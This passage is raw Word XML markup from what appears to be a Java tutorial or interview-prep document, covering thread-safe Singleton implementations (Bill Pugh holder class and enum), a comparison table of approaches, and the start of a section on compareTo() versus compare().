      </w:r>
    </w:p>
    <w:p w14:paraId="617029EF"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705AF6F" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20280799"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atic class SingletonHelper {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB83CFE"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The instance is created when the class is accessed for the first time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4908AFE5"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atic final Singleton INSTANCE = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D50B2F0"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BED9DB8" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C8717C"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6937E"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SingletonHelper.INSTANCE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6844FC8C"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9997468"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F1382B0" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8969A9" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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inner static class (SingletonHelper) contains the Singleton instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A75C6D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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The instance is created only when getInstance() is called for the first time, ensuring lazy initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639187E1" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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is approach takes advantage of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ClassLoader mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle the synchronization automatically, ensuring thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6116AB1D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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Singleton with Enum (Best Practice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF5259"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ing an enum to implement a Singleton is the simplest and most efficient approach. This approach guarantees thread-safety and serialization while avoiding the complexities of synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6FFDF"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enum Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2B1D3"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STANCE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2CE51D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385E4DDF"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doSomething() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE30AB"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method implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDBCA1"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33A4248"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D0D9D2C" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5372BC" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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 ensures that enums are instantiated only once, which guarantees thread-safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0265504C" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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approach is also immune to serialization issues, making it the best and most recommended approach for Singleton in modern Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6175B" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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parison of Approach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72"/>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="1241"/>
        <w:gridCol w:w="1093"/>
        <w:gridCol w:w="4028"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC6DCB" w:rsidRPr="00CE4B95" w14:paraId="0A28A63F" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="617AA3D3" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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pproach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38EBB51A" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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hread-Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="458F80BC" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D4A816B" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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plexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E53A689" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC6DCB" w:rsidRPr="00CE4B95" w14:paraId="2B651B40" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="547E7582"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azy Initialization with synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126EE607"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="437B604D"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derate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F2A47EE"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igh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44166D1F"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y cause performance overhead with synchronization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC6DCB" w:rsidRPr="00CE4B95" w14:paraId="7B310945" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60D329AF"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ger Initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FF30AB3"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EE2CA0"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igh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5132C76C"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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24195726"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stance is created regardless of use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC6DCB" w:rsidRPr="00CE4B95" w14:paraId="483A508D" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="233D8C50"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ill Pugh Singleton Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B3C9070"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7DD515"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igh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F64498A"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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="556614D7"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st for lazy initialization with thread-safety.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC6DCB" w:rsidRPr="00CE4B95" w14:paraId="350D6CC4" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0030FFE7"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gleton with Enum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72D5E9C0"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13756ABB"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igh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A8C5317"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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="145C53F4" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6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st practice, simple, and thread-safe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F126CB9" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6D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60E1E705" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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st Approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bill Pugh Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using a static inner class) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton with Enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are generally the most efficient and thread-safe ways to implement a Singleton in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8239C4" w14:textId="0B6871E9" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="00FC6DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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hen to Use:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Choose </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bill Pugh Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you need lazy initialization and don't want to create the instance until it's needed. Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton with Enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for simplicity and when you need the most robust and concise solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C7147E" w14:textId="1871D31F"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2D03443">
          <v:rect id="_x0000_i1189" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7860E911" w14:textId="13DA5330" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="006F7DE0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc196307542"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="007A5AD8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between compar</w:t>
      </w:r>
      <w:r w:rsidR="00F422B4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="007A5AD8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>To and compare method</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="55E8B987" w14:textId="66920439" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">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Java, both the compareTo() and compare() methods are used for comparing objects, but they are used in different contexts and serve slightly different purposes. Here's a breakdown of the differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22521F" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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compareTo() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB5668D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is a method defined in the Comparable interface. It is used to compare the current object (the object that compareTo() is called on) with another object of the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692BE94A" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Typically used to implement natural ordering for a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1B351" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ignature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: public int compareTo(T o)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6918CB" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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turn Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE912F1" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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s 0 if the objects are equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6488704E" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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s a negative integer if the current object is "less than" the specified object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149487C" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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s a positive integer if the current object is "greater than" the specified object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536EA951" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57627452"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tudent implements Comparable&lt;Student&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77155D34"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A597EB"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int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1C7F2" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152063E3"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udent(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4AE32"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB6684"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E58B231"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BB8CC47" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B81AEC4"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091A490F"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int compareTo(Student other) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50716C3C"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this.age - other.age; // Compare by age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5224F2"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C602804"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FEBDB98" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
